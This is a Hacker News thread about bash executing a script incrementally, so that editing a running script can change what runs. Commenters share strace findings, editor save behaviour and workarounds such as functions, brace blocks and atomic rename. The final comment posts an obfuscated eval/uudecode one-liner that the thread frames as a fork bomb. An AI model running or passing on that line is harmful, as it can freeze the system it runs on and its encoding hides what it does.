
Take care editing bash scripts (2019) - cxr
https://thomask.sdf.org/blog/2019/11/09/take-care-editing-bash-scripts.html
======
photon-torpedo
Whether this happens or not depends on how the file is edited, I think. From
the strace output shown in TFA, it appears the file is not opened again
between executing the lines. E.g. using vim as editor, the modified file is
actually written as a new file under the same filename. On Linux, the bash
process will keep the original file open, so the inode is not reclaimed
by the filesystem until the file is closed. Hence the bash process won't "see"
the modified script file.

I've tested this, and indeed when editing the file with vim, I can't reproduce
the "dangerous" behavior. To trigger this behavior, I'd have to _overwrite_
the script file, e.g. by

    
    
        1. create script run.sh with "sleep 30" etc
        2. create script run1.sh with "sleep 3" instead
        3. start run.sh
        4. overwrite script: cat run1.sh > run.sh
        5. after the sleep, the commented line does execute
    

Are there editors that actually overwrite the original file, instead of
creating a new file? I thought the latter is the recommended approach as it
can prevent data loss e.g. if there's a crash during writing the file.

P.S. If the script in question is on a network file system, things may be
different even for vim. E.g. on NFS the file handle doesn't behave fully like
a regular POSIX file handle, and the NFS server might actually reopen the file
between reads, thus delivering the modified contents to the bash process.
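The overwrite-vs-rename difference above can be checked directly with inode
numbers. A minimal sketch, assuming Linux with GNU coreutils (`stat -c %i`);
the filenames are illustrative:

```shell
#!/bin/bash
set -e
dir=$(mktemp -d)
echo 'sleep 30' > "$dir/run.sh"
exec 3< "$dir/run.sh"            # stand-in for a bash still running the script
before=$(stat -c %i "$dir/run.sh")

# overwrite in place, as "cat run1.sh > run.sh" does: truncates and
# rewrites the SAME inode, so a running bash reads the new bytes
echo 'sleep 3' > "$dir/run.sh"
same=$(stat -c %i "$dir/run.sh")

# rename-style save: write a new file, then move it over the old name;
# the running bash keeps reading the old, now-unlinked inode
echo 'sleep 3' > "$dir/run.sh.new"
mv "$dir/run.sh.new" "$dir/run.sh"
after=$(stat -c %i "$dir/run.sh")

echo "before=$before same=$same after=$after"
exec 3<&-
```

Because fd 3 keeps the original inode alive (as a running bash would), the
renamed-in file is guaranteed to get a fresh inode, while the in-place
redirection reuses the same one.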

~~~
usefulcat
> E.g. using vim as editor, the modified file is actually written as a new
> file under the same filename.

I don't know much about the internal workings of vim, but I do know two
things:

1) I use vim exclusively (on linux anyway).

2) I have been bitten by this exact problem.

I guess I can understand why bash works this way: it means it can handle
arbitrarily long scripts without having to read the entire script into memory
at once. But purely from an everyday usability perspective, this is a really
bad design decision. Does anyone know if there's a way to force it to read the
whole script into memory on startup?

~~~
fl0wenol
When writing a long script, you should bundle everything into functions and
then call one that kicks everything off at the end. This prevents the problem
mentioned here, and it also helps keep the script organized.
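A minimal sketch of the pattern (function names are illustrative): bash parses
each function definition as one complete compound command before executing
anything, so the bodies are safely in memory by the time the final call runs:

```shell
#!/bin/bash

do_work() {
    echo "working"
    sleep 1          # imagine the long-running part here
}

cleanup() {
    echo "cleaning up"
}

main() {
    do_work
    cleanup
}

# the only top-level statement that does any work
main "$@"
```

One caveat: after `main` returns, bash still reads the file from its saved
offset, so an in-place edit that leaves bytes beyond that offset can still be
executed; ending the script with an explicit `exit` after the call closes
that gap.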

~~~
firethief
I'm surprised that helps. Instead of the seeking behavior demonstrated in the
`strace`, does it switch to another way of keeping state after a backward
jump?

It would also have to buffer the whole file even though it's painstakingly
executing it in a way that doesn't require a buffer.

~~~
jolmg
I would imagine it's the same thing. It's going by top-level statement. The
backward jump is just to keep track of which top-level statement it has read
so far. It's not about being positioned on what it's currently running.

> painstakingly executing it in a way that doesn't require a buffer.

I don't understand why people keep saying that. There's a buffer of 64 bytes.
You mean in a way that doesn't require slurping the file. It avoids slurping
precisely by buffering.

------
ciprian_craciun
I'm glad someone finally wrote about this issue.

I also stumbled upon this a few years ago, but I blamed myself (for using
an editor that saves in place), and just applied the following "workaround"
when needed: wrap the whole script in a function, and as the last line of the
script just call it with `_main "${@}"`.

~~~
Pawamoy
To expand on this, yes, you can force Bash to read more lines and keep them in
memory before executing them by wrapping them in blocks. These blocks can be
(), {}, functions, and maybe other structures.

In addition to this, you can make sure no appended code is ever executed by
explicitly running "exit" at the end of your block. I actually used this trick
in a self git-updating script (the updated version could contain more lines at
the end).
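A sketch of that trick, run here inside a child bash reading from a pipe so
the effect is observable (the "appended by updater" line stands in for
whatever a self-update might add):

```shell
#!/bin/bash
# The braces force bash to read the whole group before executing it, and
# the explicit exit guarantees that lines appended below the block are
# never reached on this invocation.
out=$(bash -s <<'EOF'
{
    echo "current version doing its work"
    exit 0
}
echo "appended by updater"   # only takes effect on the next run
EOF
)
echo "$out"
```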

------
rasz
DOS/Windows batch files behave the same way. COMMAND.COM rereads the whole
batch file every time it executes one command line.

    
    
        PING localhost -n 10
        #echo nothing to see here
        echo finish
    

    
    
        D:\123>PING localhost -n 10
    
        Pinging ... [127.0.0.1] with 32 bytes of data:
        Reply from 127.0.0.1: bytes=32 time<1ms TTL=64
        ...
    
        Ping statistics for 127.0.0.1:
            Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),
        Approximate round trip times in milli-seconds:
            Minimum = 0ms, Maximum = 0ms, Average = 0ms
    
        D:\123>#echo nothing to see here
        '#echo' is not recognized as an internal or external command,
        operable program or batch file.
    
        D:\123>echo finish
        finish
    

Now rerun it and, while the ping is still running, edit the first line to
'PING localhost -n 1', and suddenly:

    
    
        ...
        Approximate round trip times in milli-seconds:
            Minimum = 0ms, Maximum = 0ms, Average = 0ms
    
        D:\123>echo nothing to see here
        nothing to see here
    
        D:\123>echo finish
        finish
    

~~~
JdeBP
This is why Rex Conn's add-on command interpreter for MS/PC/DR-DOS, 4DOS, had
the concept of BTM scripts. BTM stands for "Batch To Memory" and 4DOS (and all
of its successors through NDOS, 4NT, and 4OS2 to the current Take Command)
reads the entirety of a BTM script before running it.

* [https://jpsoft.com/help/batchtype.htm](https://jpsoft.com/help/batchtype.htm)

The reason that this could not be simply turned on globally for BAT scripts is
that various tools made use of the original behaviour, perhaps most notably
"fancy change directory" scripts and similar programs, where a wrapped
executable was called from a wrapper script, and the executable rewrote the
next lines of the script on the fly to do the selected action.

------
acqq
I've repeatedly observed the described problem, and I read about a
workaround: when writing the "top level" lines of a script, never write them
alone, but inside a { } block.

It looks like this in my case:

    
    
        somefunction()
        {
           ...
        }
    
        # main
        {
           ...
        }
    

Now whatever is inside of any of the functions or inside of the "main" braces
will be read at once and it won't be replaced with some new lines if I edit
the file while the execution still hasn't finished.

I would surely prefer having some global flag "reread the script" for those
who need the old behavior, and a "sane" default for most users (never
reread). But general user-friendliness and reasonable defaults were seldom a
desired goal in the circles that decide about the development of these
programs.

~~~
chubot
Hm I put all shell code in functions for other reasons, but it's interesting
to know it solves another problem.

[http://www.oilshell.org/blog/2020/02/good-parts-
sketch.html#...](http://www.oilshell.org/blog/2020/02/good-parts-
sketch.html#the-0-dispatch-pattern-solves-three-important-problems)

To summarize:

1) saving many interactive snippets in a single file -- each one is a function

2) expose entire shell functions to tools like xargs and chroot

3) if $0 myfunc solves the "ignored errexit" problem

now

4) safely modify a bash script while it's executing

------
theodpHN
FWIW, the IBM mainframe world's partitioned dataset (PDS) addressed this issue
40+ years ago. Old processes continue to run with the version of the PDS
member they started with, while new processes start with a newer version, if
one exists. Similar to read consistency features of Oracle.

------
yjftsjthsd-h
Has this been reported as a bug? Because it strains credulity to think that
this is really intended behavior.

~~~
greggyb
I wouldn't predict this, but I don't find it terribly out of line.

Bash, and shells in general, are designed to be interactive command execution
environments. The syntax easily allows multiple commands on a single line, and
this is not uncommon in interactive or scripting use, in my experience. Many
shells also favor permissive execution. What I mean by this is that they will
keep running as far as they can. It is perfectly reasonable (at least based on
the behavior of many shells) for a script to run several commands successfully
and then fail later on when facing a syntax error or nonexistent command.

Many shells are also carrying design decisions from a much more resource-
constrained era of computing.

It certainly makes sense in terms of preserving system resources to simply
execute a command at a time, to full completion, before even reading forward.
This minimizes the amount of parsing and the amount of script required to keep
in memory. I am not saying that this is the best way to do things, but that it
is an optimization along certain axes.

Separately, it is not unreasonable in terms of design and implementation of a
shell to unify as much as possible the scripting environment and the
interactive environment. Keeping this in mind, the way to think of a script is
just as an interactive session. Each line is just a command entered at the
prompt. This ensures that behavior in scripts is the same as the behavior the
user sees every day. How else would you implement this, especially in the
face of resource constraints? I am not saying that the implementation as it
stands is correct or good, just that this is not unreasonable behavior.

~~~
ciprian_craciun
Furthermore I would say this is actually a "feature", as some scripts might be
too large to fit into limited memory, and also reading-and-executing one step
at a time allows one to write "dynamic" scripts that are generated as they are
executed.

Although I haven't written such "dynamic" scripts (yet), I'm sure a few exist
that, based on `expect` and `bash`, work in a "feedback-loop" manner.

~~~
ArchD
If you want to use a 'dynamic' script, why not pipe from stdin instead?

~~~
ciprian_craciun
Yes, you are right, pipes are mandatory here.

When I was referring to a "dynamic" script I didn't mean "just append to a
file", but instead I was referring to the fact that `bash` doesn't first try
to load the whole script, parse and then execute it, but instead it "streams"
through the script.

------
tannhaeuser
There used to be a "text file busy" error to prevent that from happening,
where "text" refers to the code segment of an ELF binary, but I've seen the
error for shell script "text" as well. Isn't it there anymore?

~~~
duskwuff
That error only applies to executables that get mapped into memory while
running -- which is to say, binary executables. Script executables have never
had that behavior.

~~~
tannhaeuser
That makes sense, but I have faint memories of vi rejecting writes to running
scripts. Maybe it was on Solaris or AIX.

------
jcynix
It doesn't happen with the z-shell (zsh) as I just tested under Debian. Bash
shows the described behaviour. Interesting, need to look at other shells too,
later.

But it's definitely better to be careful and expect the bash ("classic"?)
behaviour.

~~~
clort
Bear in mind that bash deliberately seeks back to the exact character
position, but other shells might not handle this at all and instead just read
from buffered stdin. For such a small script the whole thing has been read
into the buffer, but a longer script might fail at an otherwise unobvious
point.

Unless you know that it is explicitly safe (ie the whole file has been cached
before it starts) then you should really not modify any running file.

------
atorodius
Oh wow! I had the feeling that something like this affected me a handful of
times, but I was never sure and I couldn't reproduce it, so I just ignored it.
That's quite crazy!

~~~
kristopolous
Stylistically it's outside the scope.

Bash is a classic-style tool; if you hammer your thumb instead of a nail, that
doesn't mean the design of hammers needs to be fixed. It's meant to be useful,
not smart.

This attitude is why the core utils have remained so damn useful for 50 years
and haven't devolved into dysfunctional messes.

Choosing what not to do is important.

------
downerending
IIRC, older versions of Python would run with a (writable) fd open to the
initial script. If you weren't paying attention, it was possible to
accidentally modify that script.

------
Uehreka
It’s weird, I’ve been using bash for over ten years now, and just started
noticing this behavior a couple weeks ago. It probably has to do with the
nature of the scripts I’m running these days (bash scripts that call docker
commands to build complicated images and then do other stuff). I could tell
that bash wasn’t reading the whole script before executing, but I didn’t spend
the time to figure out exactly what the real behavior was. Thanks to the
author for this analysis!

~~~
alexis_fr
I have noticed this behavior on Ubuntu in 13.13. On the other hand, I kept the
habit of expecting a script to fail when modifying it (most of the time,
starting a command in the middle makes it fail) but it never seems to occur on
macOS’s bash.

~~~
Y_Y
Was that the Ubuntu released in the 13th month of 2013, Fictional Ferret?

------
oddline
Yikes,

    
    
        $ cat rewrite_me 
        #!/bin/bash
        C=$(sed -r 's,^(C.+sed.+)#$,\1,g' ./$0); echo "$C" > $0  #####
        # date
    
        $ ./rewrite_me 
        Fri 08 May 2020 11:41:52 PM CEST

------
dooglius
This isn't specific to bash scripts, this can happen to pretty much any file.
What we really need is a way for a process to atomically "check out" a copy of
a file to read from that won't change.

~~~
wahern
An atomic read fork isn't sufficient. The file could be inconsistent if
another process is currently writing to the file at the moment of the
snapshot. What you need is an atomic write, which is already provided by
rename(2).

I've always found it odd that binaries and scripts are often installed 755,
including in /bin and /sbin.[1] Perhaps it's because install scripts don't
bother changing the read/write permissions, so executables end up with 755
because the default umask is 022.

Anyhow, I've taken to removing all write permissions from most of my files,
not just executables. I haven't yet experimented with changing my umask to
222, but I suspect it would cause many programs, especially editors, to fail.

[1] At least on Linux. I just checked OpenBSD and they're 555. But even on
OpenBSD most files in /usr/local/{bin,sbin}, installed by third-party
packages, are 755.
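The 755 numbers follow directly from the umask arithmetic; a quick sketch:

```shell
# An executable created with mode 0777 and masked by the common umask of
# 022 ends up 0755 (rwxr-xr-x); a umask of 222 would likewise strip all
# write bits from a 0777 request, giving 0555.
printf '0777 & ~0022 -> %o\n' $(( 0777 & ~0022 ))
printf '0777 & ~0222 -> %o\n' $(( 0777 & ~0222 ))
```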

------
lisper
Title should be: Take Care Editing _Running_ BASH Scripts.

~~~
jolmg
Yeah, I was just thinking about how this could only happen when editing
scripts while they're running. It doesn't make sense to do that with regular,
non-interactive CLI scripts, but I guess it does with interactive ones that
display a TUI or prompt.

------
chrismorgan
Batch files on Windows do the same thing. That’s caught me out far more often,
because I make errors in my batch files much more often than I do with shell
scripts.

~~~
malkia
I was just going to comment on this. I believe batch files buffer one line at
a time, but I can't confirm.

~~~
jz_
They do.

It can be used to interact with the execution of the current program. It's as
simple as appending further code with a label and jumping to it using goto. I
first noticed it in 2007 and started using it in production.

------
michaelmrose
I can reproduce this in bash but not in fish or zsh. This seems to be a
uniquely bad feature of bash.

~~~
0ld
yep, i've also checked bourne shell and csh/tcsh; can't reproduce it either.
only in bash

------
kristianp
I've noticed this behaviour in the past. I remember a Sun Solaris server at
work back around 2009 getting taken down by someone editing a script while it
was running. The scripts always had an rm -rf as part of the cleanup of
working files.

------
renewiltord
I wonder if folks using Chef to ensure a file is present used a "clobber-
always" mode and had it behave correctly. I would imagine so since Chef should
make a new file. Anyway, a problem for an older age.

------
cracauer
This is why my directories with shell scripts have a "make install" target.
For execution they are copied to a place where they are unlinked before being
written anew.

~~~
JdeBP
As M. Ahern points out at
[https://news.ycombinator.com/item?id=23098813](https://news.ycombinator.com/item?id=23098813)
, that's only part of the job.

Assuming that you actually use rename() to do the unlinking and atomic
updating, the "make install" should _also_ ensure that write permission is
removed from the new files.

* [https://github.com/jdebp/nosh/blob/79b1c0aab9834a09a59e15d47...](https://github.com/jdebp/nosh/blob/79b1c0aab9834a09a59e15d47710f355c5c0417a/package/makeinstall#L30)

------
noisy_boy
I saw this years ago when I was running a script, then thought of a change
and edited it while it was still running. The odd execution thereafter gave
it away.

------
einpoklum
I had always assumed that bash first read the whole script into memory (unless
it was huge), then parsed and interpreted it. Guess I was wrong. Thanks.

------
alok4nand
I may be missing something here, but why are things like this not reported as
a bug?

~~~
jchw
It is not really a bug, just counterintuitive behavior. Their example is
somewhat contrived; usually this will just manifest as something being broken.

If you use an editor with safe saves this might not even happen because that
works by saving to a temp file and doing an atomic swap, and unlinking the old
file. In that case, I believe the script should continue as written, because
the fd should point to the unlinked file. I believe vim does this by default,
for example.

~~~
larschdk
Using rename() does this for you. It's actually guaranteed to preserve the
contents of the old file for any process still having it open while atomically
letting any future process only see the new file.
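In shell terms the same atomic-replace idiom looks like this sketch (mv on
the same filesystem is a rename(2); the filenames are illustrative):

```shell
#!/bin/bash
set -e
dir=$(mktemp -d)
target="$dir/script.sh"
echo 'echo old version' > "$target"

# safe save: write the full new contents to a temp file on the same
# filesystem, then rename it over the original in one atomic step
tmp=$(mktemp "$target.XXXXXX")
echo 'echo new version' > "$tmp"
mv -- "$tmp" "$target"

cat "$target"
```

Any process that already had the old file open keeps reading the old,
now-unlinked inode; any process opening the path afterwards sees only the
complete new contents.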

------
tragomaskhalos
Windows .bat files are notorious for this behaviour; disappointing to see it
in bash.

------
pnut
Hot patching is dangerous in all execution environments.

This is software engineering... Separate your dev environment from production
and do a controlled deployment.

~~~
rkangel
Every binary executable on a Linux system can be deleted and replaced while
the running program is unaffected. Every Python script can be edited while
it's running with no effect.

It comes as a surprise the first time you experience it that this rule doesn't
hold for bash scripts.

~~~
toast0
> Every binary executable on a Linux system can be deleted and replaced while
> the running program is unaffected.

Deleting and replacing is different from editing in place. I don't know about
Linux, but you can edit a running binary on FreeBSD and it affects running
copies (it's all memory-mapped from the file); that's why I use install
instead of cp to update binaries (including shared libraries).
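That difference can be sketched with inode numbers (GNU coreutils `install`
and `stat` assumed, on Linux rather than FreeBSD, but the unlink-before-copy
behaviour is the point):

```shell
#!/bin/bash
set -e
dir=$(mktemp -d)
echo 'old build' > "$dir/prog"
exec 3< "$dir/prog"              # stand-in for a process running the old binary
old_inode=$(stat -c %i "$dir/prog")

echo 'new build' > "$dir/src"
# install unlinks the destination first, so the new file gets a fresh
# inode and the running "process" keeps its old mapping; cp would write
# into the existing inode instead
install -m 755 "$dir/src" "$dir/prog"
new_inode=$(stat -c %i "$dir/prog")

echo "old=$old_inode new=$new_inode"
exec 3<&-
```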

------
amelius
If you put such dangerous commands on your website, then please make them not
user-selectable.

~~~
netsharc
Oh lord... Is there any further baby-proofing you'd like to see?

~~~
yachtman
No one post any fork bombs...

~~~
Filligree
Such as this?

    
    
      eval $(echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode)

